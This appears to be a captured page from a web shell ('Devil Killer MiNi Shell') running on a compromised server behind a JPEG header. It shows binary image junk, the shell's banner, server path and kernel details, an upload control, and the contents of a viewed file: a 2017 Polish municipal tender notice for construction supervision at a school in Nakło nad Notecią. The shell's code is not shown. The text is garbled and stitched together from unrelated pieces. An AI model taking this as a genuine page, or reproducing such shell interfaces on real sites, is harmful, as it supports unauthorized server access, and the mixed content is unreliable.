JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170427/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170427/75464-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.naklo.pl' target='_blank'>http://www.bip.naklo.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 75464 - 2017
              z dnia 2017-04-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nakło nad Notecią: 
Pełnienie funkcji Inspektora nadzoru Inwestorskiego nad realizacja zadania pn. Termomodernizacja obiektów: Zespołu Szkolno- Przedszkolnego Nr 3 oraz Gimnazjum Nr 3 
w Nakle nad Notecią

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Nakło nad Notecią, krajowy numer identyfikacyjny
              092350895, ul.
              Ks. Piotra Skargi  
              7,
              89-100 
              Nakło nad Notecią, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              52 386 79 01, e-mail
              malgorzata.balzer@umig.naklo.pl, 
cybulska.emilia@umig.naklo.pl, faks
              52 386 79 02.
              <br />
              Adres strony internetowej (URL): www.bip.naklo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.naklo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Gmina Nakło nad Notecią; ul. Ks. P. Skargi 7; 89-100 Nakło nad Notecią</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>
Pełnienie funkcji Inspektora nadzoru Inwestorskiego nad realizacja zadania pn. Termomodernizacja obiektów: Zespołu Szkolno- Przedszkolnego Nr 3 oraz Gimnazjum Nr 3 
w Nakle nad Notecią

<br /><b>Numer referencyjny: </b>ZP.271.10.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie jest realizowane w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego 2014-2020, Oś priorytetowa 3. Efektywność energetyczna i Gospodarka  niskoemisyjna w regionie, Działanie 3.5 Efektywność energetyczna i gospodarka niskoemisyjna w ramach ZIT, Poddziałanie 3.5.1 Efektywność energetyczna 
w sektorze publicznym i mieszkaniowym w ramach ZIT, Schemat: Termomodernizacja w obiektach należących do jednostek samorządu terytorialnego w ramach Zintegrowanych Inwestycji Terytorialnych (ZIT).
Przedmiotem zamówienia jest pełnienie przez Inspektora  Nadzoru Inwestorskiego, zwanego dalej  Wykonawcą kompleksowego nadzoru inwestorskiego nad realizacją zadania inwestycyjnego pn.: 
Termomodernizacja obiektów: Zespołu Szkolno- Przedszkolnego Nr 3 oraz Gimnazjum Nr 3 w Nakle nad Notecią.

Wartość  kosztorysowa nadzorowanego zadania:
Termomodernizacja obiektów: Zespołu Szkolno- Przedszkolnego Nr 3 oraz Gimnazjum Nr 3 w Nakle nad Notecią  - 4.413.307,99 zł brutto.
Wykonawca zapewni po swojej stronie odpowiedni zespół, który posiada niezbędną zdolność techniczną i zawodową w postaci Inspektorów Nadzoru Inwestorskiego w specjalnościach:
a) konstrukcyjno-budowlanej, bez ograniczeń,
b) instalacyjnej w zakresie instalacji i urządzeń cieplnych, wodociągowych, bez ograniczeń,   
c) instalacyjnej w zakresie  instalacji i urządzeń elektrycznych, bez ograniczeń.
Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze zamówienie, pod warunkiem, iż osoba ta spełnia łącznie wymagania dla każdej z łączonej funkcji. 
W związku z ustanowieniem Inspektorów Nadzoru Inwestorskiego w zakresie różnych specjalności, Zamawiający wymaga wyznaczenia Inspektora Nadzoru Inwestorskiego specjalności konstrukcyjno-budowlanej, jako koordynatora ich czynności na budowie.
Dokumentacja projektowa oraz STWiOR dotycząca inwestycji objętej  usługą nadzoru inwestorskiego dostępna jest na stronie Zamawiającego w Biuletynie Informacji Publicznej: www.naklo.bip.pl  
w zakładce zamówienia publiczne  -  tytuł postępowania:
Termomodernizacja obiektów: Zespołu Szkolno- Przedszkolnego Nr 3 oraz Gimnazjum Nr 3 w Nakle nad Notecią

Zamawiający zaleca, aby Wykonawcy zapoznali się z dokumentacją projektową oraz STWiOR na obiekt. Ponadto wskazane jest dokonanie wizji lokalnej obiektu.  Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
Wykonawca zobowiązany będzie realizować usługę nadzoru inwestorskiego zgodnie z obowiązującymi normami i wiedzą techniczną, określonymi m.in. ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2016 r. poz. 290 ze zm.) przy zachowaniu należytej staranności, właściwej organizacji pracy oraz zasad BHP.

I.	 Obowiązki ogólne

1. Nadzór Inwestorski sprawowany będzie w następujący sposób: termin rozpoczęcia - od 
    daty podpisania umowy poprzez spisanie protokołu końcowego na wykonane roboty 
    budowlane  bez  uwag,  do złożenia wniosku o płatność końcową tj. do 30.06.2018 r. 
    Termin realizacji zadania przez Wykonawcę robót budowlanych  do 31.03.2018 r. 
    Ponadto Wykonawca pełniący funkcję Inspektora Nadzoru Inwestorskiego dla     zadania  inwestycyjnego zobowiązany będzie pełnić tę funkcję przez cały  czas trwania     gwarancji określonej w umowie z Wykonawcą robót  budowlanych.
2.	Czas pracy inspektorów nadzoru inwestorskiego powinien być dostosowany do czasu pracy Wykonawcy robót budowanych w godzinach od 7:00 do 15:00 niezależnie od czasu trwania tego pobytu. 
3.	Wymagana jest obecność na placu budowy /miejscu prowadzenia robót  w odstępach czasu zabezpieczających skuteczny i prawidłowy nadzór, w tym: 
- obligatoryjna minimalna ilość pobytów kontrolnych na budowie/miejscu prowadzenia robót nadzorowanego zadania, w specjalności konstrukcyjno-budowlanej, w ciągu każdego tygodnia, 
w okresie realizacji zamówienia (tj. od dnia przekazania wykonawcy robót budowlanych placu budowy/miejsca realizacji robót, do dnia zgłoszenia przez wykonawcę robót nadzorowanego zadania do odbioru końcowego) - 2 pobyty/tydzień.
- obligatoryjna minimalna ilość pobytów kontrolnych na budowie/miejscu prowadzenia robót nadzorowanego zadania,  w specjalności w zakresie instalacji i urządzeń cieplnych, wodociągowych, w ciągu każdego tygodnia, w okresie realizacji zamówienia (tj. od dnia rozpoczęcia robót branży sanitarnej do ich zakończenia) - 2 pobyty/tydzień, 
- obligatoryjna minimalna ilość pobytów kontrolnych na budowie/miejscu prowadzenia robót nadzorowanego zadania, w specjalności w zakresie instalacji i urządzeń elektrycznych, w ciągu każdego tygodnia, w okresie realizacji zamówienia (tj. od dnia rozpoczęcia robót branży elektrycznej do ich zakończenia) - 2 pobyty na tydzień, 
oraz - dodatkowe pobyty na budowie/miejscu prowadzenia robót nadzorowanego zadania, na każde wezwanie Zamawiającego oraz w sytuacjach problematycznych (problemy związane 
z realizacją robót) i/lub nagłych i/lub awaryjnych oraz w trakcie odbioru końcowego, a także w sytuacjach, gdy wyczerpany został limit tygodniowych obligatoryjnych pobytów kontrolnych,a obecność inspektora (inspektorów) nadzoru inwestorskiego jest niezbędna dla zapewnienia właściwego nadzoru inwestorskiego nad prowadzonymi pracami. Obecność Inspektorów Nadzoru Inwestorskiego konieczna będzie również w niezbędnym zakresie (na każde wezwanie Zamawiającego) celem przedstawienia danych do przygotowania wniosków o płatność w ramach rozliczenia zadania inwestycyjnego z Urzędem Marszałkowskim w Toruniu a także w przypadku konieczności uwzględnienia  uwag wniesionych przez  Urząd Marszałkowski. W trakcie prowadzenia robót budowlanych każdy z Inspektorów Nadzoru Inwestorskiego będzie potwierdzał swój pobyt w karcie pobytów  założonej w celu możliwości weryfikacji pobytów Inspektorów Nadzoru Inwestorskiego na budowie, znajdującej się 
w Urzędzie Miasta i Gminy w Nakle nad Notecią. 
4.Zamówienie obejmuje sprawowanie nadzoru inwestorskiego w zakresie wynikającym z: 
a)	przepisów ustawy - Prawo budowlane oraz właściwych przepisów wykonawczych  wydanych na jego podstawie oraz zasad wiedzy technicznej i sztuki budowlanej,
b)	dokumentacji projektowej (projekty, specyfikacje techniczne wykonania i odbioru robót, przedmiary robót, audyt energetyczny, kosztorysy ofertowe),
c)	umowy zawartej z wykonawcą robót budowlanych,
d)	wymagań Zamawiającego. W ramach sprawowania nadzoru inwestorskiego Wykonawca będzie realizował zamówienie poprzez ustanowionych Inspektorów Nadzoru Inwestorskiego, przy czym zapewni ciągłość świadczonej usługi w przypadku nieobecności któregokolwiek Inspektora Nadzoru Inwestorskiego poprzez ustanowienie nowego inspektora nadzoru o nie mniejszych kwalifikacjach niż pierwotnie ustanowiony - zastępowany inspektor nadzoru inwestorskiego.
5.Wszystkie dokumenty stosowane podczas realizacji przedmiotu zamówienia muszą zawierać minimum: 
1) znak Unii Europejskiej, znak Funduszy Europejskich oraz znak Urzędu Marszałkowskiego Województwa Kujawsko-Pomorskiego 
2) w konfiguracji z innymi znakami, znak Funduszy Europejskich wraz z nazwą programu należy umieszczać zawsze z lewej strony, znak Unii Europejskiej wraz ze słownym odniesieniem do Unii Europejskiej oraz Europejskiego Funduszu Rozwoju Regionalnego z prawej strony, natomiast znak Urzędu Marszałkowskiego Województwa Kujawsko-Pomorskiego powinno znaleźć się w przestrzeni pomiędzy wymienionymi znakami, 
3) tekst Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego Programu Operacyjnego Województwa Kujawsko -Pomorskiego na lata 2014  2020. 
II. Etapy współpracy Inspektora Nadzoru Inwestorskiego z Zamawiającym
	Etap budowy i rozliczenia,
	Etap po zakończeniu robót.

Etap budowy i rozliczenia tj. okres od dnia przekazania placu budowy Wykonawcy robót budowlanych do złożenia wniosku o płatność końcową do Urzędu Marszałkowskiego w Toruniu. 
1.    Inspektor Nadzoru Inwestorskiego jest upoważniony i zobowiązany w szczególności do:
1)	wspierania Zamawiającego we wszystkich czynnościach technicznych, administracyjnych 
i finansowych związanych z realizacją zadania inwestycyjnego;
2)	działania w imieniu Zamawiającego w ścisłej z nim współpracy i na podstawie  nadanych upoważnień mając zawsze na względzie pomyślne ukończenie zadania inwestycyjnego 
w sposób poprawny jakościowo i w przewidzianych terminach;
3)	zapoznania się z dokumentacją  projektową (projekty budowlane i wykonawcze,    specyfikacje techniczne wykonania i odbioru robót, przedmiary robót, audyt energetyczny), kosztorysami ofertowymi oraz umową zawartą z wykonawcą robót nadzorowanego zadania, 
4)	    udostępnienia numeru telefonu komórkowego każdego z Inspektorów Nadzoru 
   inwestorskiego umożliwiającego szybki i bezpośredni kontakt, w razie konieczności
   codzienny telefoniczny kontakt z Zamawiającym w bieżących sprawach inwestycji,
5)	reprezentowania Zamawiającego w kontaktach z osobami trzecimi w sprawach związanych realizacją zamówienia a w szczególności w kontaktach z przedstawicielami oświaty oraz właścicielami urządzeń infrastruktury technicznej, itp.;
6)	prowadzenia nadzoru inwestorskiego nad wszystkimi robotami budowlanymi objętymi przedmiotem umowy w pełnym zakresie obowiązków wynikających z przepisów ustawy Prawo budowlane; łącznie z robotami koniecznymi do wykonania, a nie ujętymi 
w dokumentacji projektowej i niemożliwymi do przewidzenia na etapie podpisywania umowy;
7)	 swobodnego dostępu do terenu budowy oraz wszelkich miejsc gdzie materiały
 i urządzenia będą pozyskiwane, wytwarzane, montowane, składowane lub   
 przygotowywane do wbudowania;
8)	     przygotowania niezbędnych dokumentów do przekazania placu budowy  i przekazanie go 
     Wykonawcy robót budowlanych w obecności przedstawiciela  Urzędu Miasta i Gminy 
     w Nakle nad Notecią;
9)	     uzgodnienia z Wykonawcą procedur (wzory druków i obieg dokumentów) jakie 
     będą  obowiązywać podczas procesu prowadzenia inwestycji; 
10)	egzekwowania od Wykonawcy uaktualnionego harmonogramu rzeczowo-finansowego robót w zależności od postępu robót oraz jego akceptacji w ciągu 7 dni;
11)	prowadzenia regularnych (potwierdzonych wpisem do dziennika budowy) inspekcji na terenie budowy w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami specyfikacji technicznych wykonania i odbioru robót budowlanych, dokumentacji projektowej oraz praktyką inżynierską; kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu i stosowania 
w budownictwie;
12)	w przypadku wykonywania robót przez podwykonawców ciągłe monitorowanie wykonywanych przez nich robót, a w szczególności: 
a) posiadanie wiedzy na temat wykonywania robót przez podwykonawców
i nadzorowanie dokonywania wpisu do dziennika budowy o wykonywaniu robót przez konkretnego podwykonawcę, 
b) nadzorowanie poprawności wprowadzenia podwykonawców do realizacji robót budowlanych, a zwłaszcza stwierdzania zawarcia umów o podwykonawstwo wg zatwierdzonego projektu umowy;
13)	monitorowania postępu robót poprzez sprawdzanie rzeczywistego zaawansowania
i zgodności z obowiązującym przy realizacji przedmiotu umowy harmonogramem robót; 
14)	kontrolowania przestrzegania przez Wykonawcę robót budowlanych zasad  bezpieczeństwa pracy i utrzymania porządku na terenie budowy, w przypadku stwierdzenia jakichkolwiek nieprawidłowości zobligowanie Wykonawcy wpisem do dziennika budowy do naprawy sytuacji;
15)	udzielania Wykonawcy robót wszelkich dostępnych informacji i wyjaśnień dotyczących realizowanego zadania inwestycyjnego;
16)	podejmowania decyzji o wstrzymaniu części lub całości robót w sytuacjach określonych w warunkach umowy  na roboty budowlane oraz powiadamianie niezwłoczne o takich zdarzeniach Zamawiającego;
17)	wnioskowania o usunięcie z terenu budowy każdej osoby zatrudnionej przez      Wykonawcę robót budowlanych, która zachowuje się niewłaściwie lub jest       niekompetentna;
18)	organizacji oraz przewodniczenia naradom dotyczącym postępu robót (Rad Budowy), w których udział biorą przedstawiciele zaangażowanych w realizację umowy stron (Kierownik robót, Inspektor Nadzoru Inwestorskiego, Wykonawca robót budowlanych oraz inni przedstawiciele firm biorących udział w realizacji budowy) oraz sporządzania protokołów 
z tych narad i przekazywania ich Zamawiającemu i Wykonawcy robót w terminie do 5 dni od dnia narady, narady winny odbywać się wg potrzeb , minimum jeden raz na dwa tygodnie;
19)	obecność całego Zespołu Inspektora Nadzoru Inwestorskiego według potrzeb na 
      naradach budowy jest obowiązkowa;
20)	     czuwania nad realizacją elementów robót związanych z ochroną środowiska, współpracy 
z organizacjami ekologicznymi, zgodnie z obwiązującymi przepisami;
21)	     wydawania poleceń zmian Wykonawcy robót budowlanych  oraz dokonywania ich wyceny po akceptacji przez Zamawiającego;
22)	sporządzanie protokołów konieczności na roboty dodatkowe oraz  zamienne po uprzednim zaakceptowaniu ich przez Zamawiającego; sprawdzanie wycen robót dodatkowych, zamiennych i podobnych oraz kontrola rozliczeń wykonanych robót budowlanych, w uzgodnieniu z Zamawiającym negocjowanie z Wykonawcą robót budowlanych wynagrodzenia za roboty nie objęte umową podstawową, weryfikowanie kosztorysów ofertowych Wykonawcy na powyższe zakresy; 
23)	    nadzorowania wykonania robót  dodatkowych nie objętych zamówieniem podstawowym  
w ramach wynagrodzenia; 
24)	     kontroli sposobu składowania i przechowywania materiałów;
25)	     nadzorowania badań materiałów i robót wykonywanych przez Wykonawcę robót budowlanych;
26)	     udział w komisyjnym pobieraniu próbek do badań oraz powiadamiania Zamawiającego na 
3 dni przed o zamiarze ich pobrania.
27)	     zlecania Wykonawcy robót budowlanych wykonania dodatkowych badań materiałów lub robót budzących wątpliwość, co do ich jakości;
28)	    sprawdzania i formułowania zaleceń dotyczących poprawności i autentyczności wszelkich certyfikatów, polis ubezpieczeniowych, gwarancji wykonania, ubezpieczenia od odpowiedzialności cywilnej, tytułów własności sprzętu itp.;
29)	     zatwierdzania rysunków wykonawczych sporządzanych przez Wykonawcę robót budowlanych w zakresie spełnienia wymagań Zamawiającego określonych w umowie 
z Wykonawcą tych robót;
30)	     zalecenia sporządzania wszelkich koniecznych zmian w dokumentacji projektowej, które mogą okazać się konieczne lub zalecane w trakcie budowy;
31)	     weryfikowania rysunków powykonawczych" sporządzanych przez Wykonawcę robót budowlanych;
32)	     odbioru, potwierdzonego wpisem do dziennika budowy robót zanikających 
i ulegających zakryciu;
33)	sprawdzanie ilości i wartości wykonanych robót, będących podstawą do rozliczeń finansowych zamawiającego z wykonawcą robót, w oparciu  o obowiązujący harmonogram rzeczowo-finansowy i dokumenty przedstawione przez Wykonawcę robót;
34)	     sprawdzenia zgodności faktury Wykonawcy robót budowlanych z dokumentami odbioru 
i wcześniejszymi dokumentami rozliczeniowymi, zatwierdzenia, opisania i zwrotu faktury 
w terminie 3 dni od jej otrzymania; 
35)	     doradzania Zamawiającemu na temat możliwych sposobów obniżenia kosztów realizowanego przez Wykonawcę robót budowlanych zamówienia;
36)	     sprawdzenia wykonanych robót i powiadomienia Wykonawcy robót budowlanych 
o wykrytych wadach oraz określenia zakresu koniecznych do wykonania robót poprawkowych oraz wnioskowanie o potrącenie z wynagrodzenia Wykonawcy robót budowlanych kar umownych w przypadku nie usunięcia tych wad;
37)	     poświadczenia usunięcia wad przez Wykonawcę robót budowlanych; 
38)	     przygotowania odbioru częściowego i końcowego robót, przygotowania protokołu odbioru, sprawdzenia kompletności i prawidłowości przedłożonych przez Wykonawcę robót budowlanych dokumentów wymaganych do odbioru (w szczególności sprawdzenia harmonogramu finansowo-rzeczowego) oraz uczestnictwa w odbiorze robót podstawowych, i robót dodatkowych;
39)	    powiadomienia komisji odbioru o terminie i miejscu odbioru, 
40)	    poświadczenia terminu zakończenia robót;
41)	     identyfikowania wszędzie tam, gdzie jest to możliwe, ryzyk powstania potencjalnych roszczeń ze strony Wykonawcy robót budowlanych  i stron trzecich oraz informowania o tym Zamawiającego wraz z propozycjami sposobów zapobiegania tym roszczeniom;
42)	     dostarczenia Zamawiającemu wszelkich raportów, akt, certyfikatów przygotowanych przez Wykonawcę robót budowlanych po zakończeniu robót;
43)	     zapobiegania roszczeniom Wykonawcy robót budowlanych ;
44)	     powiadomienia Zamawiającego o wszelkich roszczeniach Wykonawcy robót budowlanych oraz rozbieżnościach między dokumentacją Zamawiającego a stanem faktycznym na terenie budowy i podania Zamawiającemu sposobu ich rozwiązania;
45)	     rozpatrywania roszczeń Wykonawcy robót budowlanych  i przedstawienia stanowiska 
w odniesieniu do nich;
46)	     w przypadku, gdy wszczęty zostanie spór sądowy między Zamawiającym 
a Wykonawcą robót budowlanych dotyczący realizacji zadania inwestycyjnego, reprezentowanie Zamawiającego w zakresie technicznym, poprzez przedstawianie wyczerpujących informacji i wyjaśnień dotyczących sporu oraz jednoznacznego stanowiska Inspektora Nadzoru Inwestycyjnego, co do przedmiotu sporu;
47)	     wystawiania wszelkich niezbędnych dokumentów związanych z realizacją zadania inwestycyjnego wymaganych przez Zamawiającego jak i dla potrzeb rozliczeniowo  kontrolnych z jednostek zewnętrznych;
48)	     prowadzenia bieżącej kontroli realizowanego zadania inwestycyjnego;
49)	     odpowiednio wyprzedzającego informowania Zamawiającego o wszelkich zagrożeniach, problemach jakie napotkał w trakcie realizacji robót; 
50)	     sprawdzenia ostatecznej kwoty należnej Wykonawcy robót budowlanych;
51)	     rozliczenia umowy o roboty budowlane w przypadku jej wypowiedzenia;
52)	     wydania polecenia przyspieszenia lub opóźnienia tempa robót;
